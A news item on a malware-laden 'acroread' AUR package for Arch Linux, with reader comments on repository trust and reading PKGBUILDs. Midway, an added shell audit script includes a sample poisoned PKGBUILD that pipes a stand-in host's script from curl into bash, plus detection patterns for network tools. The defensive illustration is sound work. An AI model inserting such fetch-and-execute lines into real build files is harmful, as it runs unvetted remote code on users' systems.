Arch Linux PDF reader package poisoned

Arch Linux has pulled a user-provided AUR (Arch User Repository) package, because it contained malware. If you're an Arch Linux user who downloaded a PDF viewer named "acroread" in the short time it was compromised, you'll need to delete it. While the breach isn't regarded as serious, it sparked a debate about the security of …

  1. John Smith 19 Gold badge
    Unhappy

    If you leave stuff by the side of the information superhighway someone will pick it up.

    Who knew?

  2. Drigg

    ArchLinux AUR

    As an Arch user I am well aware of the potential dangers in installing software from the user maintained repo (AUR), and I would hope that this is the case for other users too. It's pretty simple to check the installation script before running it. The advantages of having access to this repo outweigh the dangers; it just needs using with respect.

    In general, any non-moderated repos offer this risk; it certainly is not limited to Arch.

  3. i1ya
    WTF?

    What, you want me to stop building packages as root using AUR helpers?

    And reading every pkgbuild file? Sure, it will be more fun than reading every EULA for non-free software.

    But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

    1. Waseem Alkurdi

      Re: What, you want me to stop building packages as root using AUR helpers?

      But, jokes aside, I think that some malicious code can be successfully obfuscated to look more innocent to average lazy folk like me.

      Just like what he did here. He put the malicious code in a script retrieved from the Internet.

      What if you have a package that retrieves "additional data" from the Internet, not only a script?

      Like a game retrieving its assets for example.

      Should every single byte it downloads be checked?

  4. FlamingDeath Silver badge
    Facepalm

    The internet

    Was a far better place in the 90's

    Then the masses of muppets came, and with them, the sociopaths

    1. hmv

      Re: The internet

      The Morris worm was in 1988, and there were certainly many bad actors in the 1990s - my introduction to security was finding out why an AlphaServer 2100 was running a bit slow, and discovering it was riddled with nasty stuff.

  5. Anonymous Coward
    Anonymous Coward

    A dodgy acroread package? I'm shocked, I tell you!

    A dodgy acroread package? It sounds as though it has replicated the functionality of the Adobe original quite accurately...

    1. Anonymous Coward
      Anonymous Coward

      Re: A dodgy acroread package? I'm shocked, I tell you!

      No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe Linux developers...

      1. Mr_E
        Holmes

        Re: A dodgy acroread package? I'm shocked, I tell you!

        Re: A dodgy acroread package? I'm shocked, I tell you!

        No no, given the number of bugs fixed today, Adobe developers are masters of dodgy code. This one is a lame one, like many wannabe ̶L̶i̶n̶u̶x̶ developers...

        ---

        Fixed!

  6. Christian Berger

    To contrast that...

    I have seen multiple Windows users looking for software by going to google and typing "$product free download" into it...

    Yes, that's apparently still the norm for large numbers of people. BTW if you come across one of those, tell them to go to the Wikipedia page for that product (yes there are still people not knowing Wikipedia) and tell them to follow the link to the website of the manufacturer. That's much better security wise. (though not perfect)

  7. GnuTzu
    Alert

    Thank Goodness it's Not One of the "Major" Distributions

    I don't know how many Arch servers there are out there; and thankfully, this was not a server package.

    We have seriously got to protect the repos!!! PERIOD!!!

    I'll leave it up to others to elaborate.

    1. Niarbeht

      Re: Thank Goodness it's Not One of the "Major" Distributions

      This wasn't a main repository. It's an external repository for user-submitted software. Users have to either:

      A) Download the build file manually and follow some steps to build the software

      or

      B) Install an extra package manager to automate performing A.

      I still think there are some interesting lessons to be learned here, though. It might be useful for AUR pages and AUR helpers to highlight when there's been a maintainer change, or allow you to easily view the diff for the build file. I know that that information is currently available on the AUR pages themselves, but making it super obvious when changes like that have occurred would be helpful.
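As an added illustration of the check Drigg and Niarbeht describe (reading the build file, or its diff, before makepkg runs it), here is a small shell audit written for this page; it is not from the article, the AUR, or any AUR helper. The two PKGBUILDs are constructed samples, not the real acroread package, and the two heuristics (network access inside a build-time function, and a checksum set to SKIP) are a starting point, not a complete detector.

```shell
# Constructed sample PKGBUILDs (not the real acroread package). In the clean one
# every source is listed in source=() with a pinned sha256sum, so makepkg checks
# each downloaded byte before build() runs.
CLEAN_PKGBUILD='pkgname=example-viewer
pkgver=1.0
pkgrel=1
source=("https://example.org/example-viewer-1.0.tar.gz")
sha256sums=("0000000000000000000000000000000000000000000000000000000000000000")
build() {
  cd "$srcdir/example-viewer-1.0"
  make
}
package() {
  make DESTDIR="$pkgdir" install
}'
# The poisoned one skips the checksum and has package() fetch and run a script at
# build time, which makepkg never verifies.
BAD_PKGBUILD='pkgname=example-viewer
pkgver=1.0
pkgrel=1
source=("https://example.org/example-viewer-1.0.tar.gz")
sha256sums=("SKIP")
package() {
  curl -s https://example.invalid/x | bash
  make DESTDIR="$pkgdir" install
}'

# audit_pkgbuild: read a PKGBUILD on stdin, print one line per finding and return
# the number of findings (0 = nothing flagged). Heuristics: network access inside a
# build-time function, and a checksum entry of SKIP (verification disabled).
audit_pkgbuild() {
  findings=$(awk '
    /^(prepare|pkgver|build|check|package)[A-Za-z0-9_-]*\(\)/ { infunc = 1; fn = $1 }
    infunc && /(curl|wget|git clone|pip install)/ { print "network access in " fn ": " $0 }
    infunc && /^}/ { infunc = 0 }
    /sums=\(.*SKIP/ { print "checksum verification skipped: " $0 }
  ')
  [ -n "$findings" ] || return 0
  printf '%s\n' "$findings"
  return "$(printf '%s\n' "$findings" | grep -c .)"
}

# Demo: the exit status is the finding count, so it composes with a wrapper script
# that refuses to call makepkg when anything is flagged.
printf '%s\n' "$CLEAN_PKGBUILD" | audit_pkgbuild && echo "clean: nothing flagged"
printf '%s\n' "$BAD_PKGBUILD" | audit_pkgbuild || echo "poisoned: $? finding(s)"
```

Run it against `diff -u old/PKGBUILD new/PKGBUILD` output as well as the file itself and a freshly added fetch-and-execute line after a maintainer change stands out immediately.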

  8. Anonymous Coward
    Anonymous Coward

    Butt butt Lunix is secure! Windoze Micro$oft blah blah blah...

    1. Anonymous Coward
      Anonymous Coward

      "Butt butt Lunix is secure!"

      That's quite a statement for an OS that ran on the C64 with TCP/IP support and is no longer maintained.

      1. GnuTzu

        Linux is the Kernel

        I don't remember hearing about the kernel ever being infected. I still worry about the repos--given how automatically an entire system can be updated.

  9. GIRZiM

    Much as I love the AUR (and have successfully made use of lots of packages from it), I've always been a little concerned about its 'ports'-like nature: it's all well and good it being more convenient than downloading a src tarball, but I have no idea what it's pulling from those links (knowing that it's getting file abc from site xyz.somewhere doesn't give me any insight into the code itself, and for all I know the src files it dumps on my system have nothing in common with what actually gets compiled - how many bits of linked-out code get added without downloading a corresponding patch file?).

    Despite my sense of Gentoo being all hype and no trousers (it's not (B)LFS and setting and forgetting a few compile time switches is not 'compiling your own linux'), I may have to switch to it for peace of mind (just as soon as I can afford a second, identical, system on which to spend all day compiling that is *sigh*).

  10. Anonymous Coward
    Anonymous Coward

    Halo effect

    Don't blame the Arch team for any of this, in fact I give them credit - but inevitably there is a halo around the core distro (any core distro) that extends to anything that is considered "close" to it. So the very fact that AURs start at aur.archlinux.org and not aur.example.com gives AUR an (undeserved) halo of respectability. Yes I know it doesn't deserve it and the page says you try at your own risk, but the halo effect is incredibly strong. It's why people still click on phishing emails from Microsoft Support.
